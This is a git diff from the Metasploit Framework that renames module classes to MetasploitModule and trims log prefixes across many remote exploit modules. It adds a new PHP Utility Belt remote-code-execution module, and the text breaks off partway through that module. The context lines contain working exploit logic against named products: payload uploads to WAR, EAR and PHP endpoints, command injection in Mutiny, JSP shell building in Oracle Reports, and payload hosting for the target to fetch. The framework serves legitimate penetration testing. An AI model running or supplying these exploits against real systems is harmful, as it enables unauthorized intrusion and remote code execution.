/ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 uses the MySQL database - print_status("#{peer} - Detected Desktop Central v7 (MySQL)") + print_status("Detected Desktop Central v7 (MySQL)") return Exploit::CheckCode::Appears elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ @@ -600,17 +600,17 @@ class Metasploit3 < Msf::Exploit::Remote if ver_lt_eq(build, '6500') # if it's a build below 6500, it will only work if we have a JSP compiler - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") + print_status("Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") return Exploit::CheckCode::Detected elsif ver_lt(build, '6800') # PMP v6 < 6800 uses the MySQL database - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (MySQL)") + print_status("Detected Password Manager Pro v6 #{build} (MySQL)") return Exploit::CheckCode::Appears elsif ver_lt(build, '7003') - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") return Exploit::CheckCode::Appears else - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index ea739f7e8f..40cf9be0dd 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -365,9 +365,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end - print_status("#{peer} - Selecting target...") + print_status("Selecting target...") @my_target = pick_target - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 @@ -402,7 +402,7 @@ class Metasploit3 < Msf::Exploit::Remote # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) - print_status("#{peer} - Uploading bogus file...") + print_status("Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 fail_with(Failure::Unknown, "#{peer} - Bogus file upload failed") @@ -410,10 +410,10 @@ class Metasploit3 < Msf::Exploit::Remote end # Now send the actual payload - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else fail_with(Failure::Unknown, "#{peer} - EAR upload failed") end @@ -422,7 +422,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/manageengine_sd_uploader.rb b/modules/exploits/multi/http/manageengine_sd_uploader.rb index db8164c450..f975cd624b 100644 --- a/modules/exploits/multi/http/manageengine_sd_uploader.rb +++ b/modules/exploits/multi/http/manageengine_sd_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") register_files_for_cleanup(jboss_path.gsub('../../','../') + "/null/" + ear_file_name) register_files_for_cleanup("Attachments/null/" + rand_file) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index a16088a0d2..cfc0508c60 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb index 48523cc5ef..29c7e6c2f5 100644 --- a/modules/exploits/multi/http/mantisbt_php_exec.rb +++ b/modules/exploits/multi/http/mantisbt_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mediawiki_thumb.rb b/modules/exploits/multi/http/mediawiki_thumb.rb index be3bcfea1d..c42d61c2cf 100644 --- a/modules/exploits/multi/http/mediawiki_thumb.rb +++ b/modules/exploits/multi/http/mediawiki_thumb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb index 75c7502c84..e79e6b15eb 100644 --- a/modules/exploits/multi/http/mma_backdoor_upload.rb +++ b/modules/exploits/multi/http/mma_backdoor_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) payload_name = "#{rand_text_alpha(5)}.php" - print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor") + print_status("Trying to upload #{payload_name} to mma.php Backdoor") data = Rex::MIME::Message.new @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.body =~ /uplod d0n3 in SAME file/ - print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...") + print_good("Our payload #{payload_name} has been uploaded. Calling payload...") register_files_for_cleanup(payload_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index 1882bd0b24..5b37159161 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload payload # - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'uri' => normalize_uri(base, "/includes/savepage.php"), 'vars_get' => { @@ -97,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from server, will not continue.") + print_error("No response from server, will not continue.") return end # # Run payload # - print_status("#{peer} - Requesting '#{php_fname}'") + print_status("Requesting '#{php_fname}'") send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) handler diff --git a/modules/exploits/multi/http/moodle_cmd_exec.rb b/modules/exploits/multi/http/moodle_cmd_exec.rb index fa019366ef..8b1ac0a3f4 100644 --- a/modules/exploits/multi/http/moodle_cmd_exec.rb +++ b/modules/exploits/multi/http/moodle_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 61272300d7..ec129c1f43 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Exploit::Remote::HttpClient @@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote def check fingerprint = rand_text_alpha(5) - vprint_status("#{peer} - Sending check...") + vprint_status("Sending check...") begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload...") + print_status("Sending payload...") http_send_cmd(payload.encoded) end diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 8b06d3c753..8dee91cb69 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -98,20 +98,20 @@ class Metasploit3 < Msf::Exploit::Remote ] unless not @netmask_eth0 cmds << %Q|rm /tmp/#{@elfname}.elf| unless target.name =~ /CMD/ - print_status("#{peer} - Restoring Network Information and Cleanup...") + print_status("Restoring Network Information and Cleanup...") begin session.shell_command_token(cmds.join(" ; ")) rescue - print_error("#{peer} - Automatic restore and cleanup didn't work, please use these commands:") + print_error("Automatic restore and cleanup didn't work, please use these commands:") cmds.each { |cmd| print_warning(cmd) } end - print_good("#{peer} - Restoring and Cleanup successful") + print_good("Restoring and Cleanup successful") end def start_web_service - print_status("#{peer} - Setting up the Web Service...") + print_status("Setting up the Web Service...") if datastore['SSL'] ssl_restore = true @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote resource_uri = '/' + @elfname + '.elf' service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}" - print_status("#{peer} - Starting up our web service on #{service_url} ...") + print_status("Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote # wait for the data to be sent def wait_linux_payload - print_status("#{peer} - Waiting for the victim to request the ELF payload...") + print_status("Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) @@ -146,23 +146,23 @@ class Metasploit3 < Msf::Exploit::Remote end end - #print_status("#{peer} - Giving time to the payload to execute...") + #print_status("Giving time to the payload to execute...") #select(nil, nil, nil, 20) unless session_created? - print_status("#{peer} - Shutting down the web service...") + print_status("Shutting down the web service...") stop_service end # Handle incoming requests from the target def on_request_uri(cli, request) - vprint_status("#{peer} - on_request_uri called, #{request} requested") + vprint_status("on_request_uri called, #{request} requested") if (not @elf_data) - print_error("#{peer} - A request came in, but the ELF archive wasn't ready yet!") + print_error("A request came in, but the ELF archive wasn't ready yet!") return end - print_good("#{peer} - Sending the ELF payload to the target...") + print_good("Sending the ELF payload to the target...") @elf_sent = true send_response(cli, @elf_data) end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Login with the provided credentials...") + print_status("Login with the provided credentials...") res = send_request_cgi({ 'method' => 'POST', @@ -194,13 +194,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.get_cookies =~ /JSESSIONID=(.*);/ - print_good("#{peer} - Login successful") + print_good("Login successful") session = $1 else fail_with(Failure::NoAccess, "#{peer} - Unable to login in Mutiny") end - print_status("#{peer} - Leaking current Network Information...") + print_status("Leaking current Network Information...") res = send_request_cgi({ 'method' => 'GET', @@ -216,16 +216,16 @@ class Metasploit3 < Msf::Exploit::Remote static_route_address = (res.body =~ /<input class="textInput" type="text" name="staticRouteAddress" value="(.*)" \/>/ ? $1 : "") static_route_netmask = (res.body =~ /<input class="textInput" type="text" name="staticRouteNetmask" value="(.*)" \/>/ ? $1 : "") static_route_gateway = (res.body =~ /<input class="textInput" type="text" name="staticRouteGateway" value="(.*)" \/>/ ? $1 : "") - print_good("#{peer} - Information leaked successfully") + print_good("Information leaked successfully") else - print_error("#{peer} - Error leaking information, trying to exploit with random values") + print_error("Error leaking information, trying to exploit with random values") end if target.name =~ /CMD/ injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3)) injection << "; #{payload.encoded}" else - print_status("#{peer} - Generating the ELF Payload...") + print_status("Generating the ELF Payload...") @elf_data = generate_payload_exe @elfname = Rex::Text.rand_text_alpha(3+rand(3)) service_url = start_web_service @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end - print_status("#{peer} - Exploiting Command Injection...") + print_status("Exploiting Command Injection...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/nas4free_php_exec.rb b/modules/exploits/multi/http/nas4free_php_exec.rb index 2de2f53e56..95e308519c 100644 --- a/modules/exploits/multi/http/nas4free_php_exec.rb +++ b/modules/exploits/multi/http/nas4free_php_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index 5d52ed78f7..117e37cc8b 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index 290931c1c4..3173aaa9f6 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin.php'), @@ -103,13 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote return end - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = do_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Nibbleblog.") + vprint_good("Authenticated with Nibbleblog.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = Rex::MIME::Message.new @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('auto', nil, nil, 'form-data; name="image_option"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'admin.php'), @@ -144,14 +144,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Unable to upload payload.') end - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") php_fname = 'image.php' payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_fname) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/op5_license.rb b/modules/exploits/multi/http/op5_license.rb index 885c5052db..646a6d6b59 100644 --- a/modules/exploits/multi/http/op5_license.rb +++ b/modules/exploits/multi/http/op5_license.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb index d46dd09a10..d8a570bf4c 100644 --- a/modules/exploits/multi/http/op5_welcome.rb +++ b/modules/exploits/multi/http/op5_welcome.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index d18396ba80..e12572648c 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty)/ ] } diff --git a/modules/exploits/multi/http/openmediavault_cmd_exec.rb b/modules/exploits/multi/http/openmediavault_cmd_exec.rb index 4be4d81ca7..d4a5f60cac 100644 --- a/modules/exploits/multi/http/openmediavault_cmd_exec.rb +++ b/modules/exploits/multi/http/openmediavault_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/openx_backdoor_php.rb b/modules/exploits/multi/http/openx_backdoor_php.rb index 1a097fd6bb..0fd826a77b 100644 --- a/modules/exploits/multi/http/openx_backdoor_php.rb +++ b/modules/exploits/multi/http/openx_backdoor_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb index 16676fc6bd..2b1876fd2f 100644 --- a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb +++ b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # does not allow us to deploy WARs. Fix that by uploading a new context.xml file. # The file we are uploading has the same content apart from privileged="false" and lots of XML comments. # After replacing the context.xml file let's upload the WAR again. - print_status("#{peer} - Replacing Tomcat context file") + print_status("Replacing Tomcat context file") send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote }) else # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directories") + print_status("Creating upload directories") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(servlet_path), @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -117,14 +117,14 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 500 error or a 200 OK when the upload is successful. if res and (res.code == 500 or res.code == 200) - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") sleep(datastore['SLEEP']) else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end - print_status("#{peer} - Executing payload, wait for session...") + print_status("Executing payload, wait for session...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep_counter = 0 while not session_created? if sleep_counter == datastore['SLEEP'] - print_error("#{peer} - Failed to get a shell, let's try one more time") + print_error("Failed to get a shell, let's try one more time") upload_war_and_exec(true, app_base) return end diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index 8c3f73bd2c..4b8bf6c40b 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - vprint_good "#{peer} - Windows install detected " + vprint_good "Windows install detected " path = $1.gsub("\\", "/") - vprint_status "#{peer} - Path: #{path}" + vprint_status "Path: #{path}" elsif res.body =~ /\/(.*)\/showenv/ - vprint_good "#{peer} - Linux install detected" - vprint_status "#{peer} - Path: #{$1}" + vprint_good "Linux install detected" + vprint_status "Path: #{$1}" else return Exploit::CheckCode::Safe end @@ -103,10 +103,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.downcase.exclude?("<html>") - vprint_good "#{peer} - URLPARAMETER is vulnerable" + vprint_good "URLPARAMETER is vulnerable" return Exploit::CheckCode::Vulnerable else - vprint_status "#{peer} - URLPARAMETER is not vulnerable" + vprint_status "URLPARAMETER is not vulnerable" return Exploit::CheckCode::Safe end @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote @payload_dir = datastore['PAYDIR'] @local_path = "" - print_status "#{peer} - Querying showenv!" + print_status "Querying showenv!" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"), 'method' => 'GET', @@ -127,17 +127,17 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Windows install detected " + print_good "Query succeeded!" + print_status "Windows install detected " @local_path = $1.gsub("\\", "/") - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" elsif res.body =~ /\/(.*)\/showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Linux install detected" + print_good "Query succeeded!" + print_status "Linux install detected" @local_path = $1 - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" else - print_status "#{peer} - Query failed" + print_status "Query failed" fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable") end else @@ -145,14 +145,14 @@ class Metasploit3 < Msf::Exploit::Remote end if datastore['EXTURL'].blank? - print_status "#{peer} - Hosting payload locally ..." + print_status "Hosting payload locally ..." begin Timeout.timeout(datastore['HTTPDELAY']) {super} rescue Timeout::Error end exec_payload else - print_status "#{peer} - Using external url for payload delivery ..." + print_status "Using external url for payload delivery ..." @payload_url = datastore['EXTURL'] upload_payload exec_payload @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def upload_payload - print_status "#{peer} - Uploading payload ..." + print_status "Uploading payload ..." path = "/#{@local_path}#{@payload_dir}#{@payload_name}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"), @@ -191,9 +191,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good "#{peer} - Payload hopefully uploaded!" + print_good "Payload hopefully uploaded!" else - print_status "#{peer} - Payload upload failed" + print_status "Payload upload failed" end end @@ -202,11 +202,11 @@ class Metasploit3 < Msf::Exploit::Remote gen_payload_name = rand_text_alpha(8+rand(8)) encoded_pl = Rex::Text.encode_base64(generate_payload_exe) - print_status "#{peer} - Building JSP shell ..." + print_status "Building JSP shell ..." len = encoded_pl.length if len >= 60000 #java string size limit ~60k workaround - print_status "#{peer} - Adjusting shell due to payload size" + print_status "Adjusting shell due to payload size" pl_first = encoded_pl.slice(0, 60000) pl_second = encoded_pl.slice(60000, len) big_payload = true @@ -252,8 +252,8 @@ class Metasploit3 < Msf::Exploit::Remote end def exec_payload - print_status("#{peer} - Our payload is at: /reports#{@payload_dir}#{@payload_name}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: /reports#{@payload_dir}#{@payload_name}") + print_status("Executing payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name), @@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good("#{peer} - Payload executed!") + print_good("Payload executed!") else - print_status("#{peer} - Payload execution failed") + print_status("Payload execution failed") end end end diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb index 3db627caf4..21e9ab5a64 100644 --- a/modules/exploits/multi/http/pandora_upload_exec.rb +++ b/modules/exploits/multi/http/pandora_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Unknown @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote end # upload PHP payload to images/[fname] - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php, cookies) @@ -146,13 +146,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (images/#{@fname})") + print_status("Executing payload (images/#{@fname})") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 5ff2a02952..a5d142906b 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb new file mode 100644 index 0000000000..9f499e41a3 --- /dev/null +++ b/modules/exploits/multi/http/php_utility_belt_rce.rb @@ -0,0 +1,81 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PHP Utility Belt Remote Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in PHP Utility Belt, + which is a set of tools for PHP developers and should not be installed in a + production environment, since this application runs arbitrary PHP code as an + intended functionality. + }, + 'Author' => + [ + 'WICS', # initial discovery + 'Jay Turla' # msf + ], + 'References' => + [ + ['EDB', '38901'], + ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo + ], + 'DisclosureDate' => 'Dec 08 2015', + 'License' => MSF_LICENSE, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Privileged' => false, + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true + }, + 'Targets' => + [ + ['PHP Utility Belt', {}] + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']) + ], self.class) + end + + def check + txt = Rex::Text.rand_text_alpha(8) + res = http_send_command("echo #{txt};") + + if res && res.body.include?(txt) + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + http_send_command(payload.encoded) + end + + def http_send_command(cmd) + 